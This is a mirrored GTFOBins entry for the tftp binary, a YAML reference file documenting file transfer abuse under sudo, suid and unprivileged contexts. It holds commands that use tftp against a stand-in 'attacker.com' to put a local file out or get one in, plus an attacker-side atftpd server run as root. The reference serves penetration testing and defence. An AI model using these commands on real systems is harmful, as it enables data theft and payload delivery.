1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-08 06:56:15 +01:00
GTFOBins.github.io/_gtfobins/tftp
2026-01-14 23:30:27 +01:00

30 lines
676 B
Plaintext

---
functions:
download:
- code: |-
tftp attacker.com
get /path/to/input-file
contexts:
sudo:
suid:
unprivileged:
sender:
code: |-
atftpd --no-fork --verbose --daemon --no-fork --user root.root .
comment: |-
A TFTP server can be used on the attacker box to send the data.
upload:
- code: |-
tftp attacker.com
put /path/to/input-file
contexts:
sudo:
suid:
unprivileged:
receiver:
code: |-
atftpd --no-fork --verbose --daemon --no-fork --user root.root .
comment: |-
A TFTP server can be used on the attacker box to receive the data.
...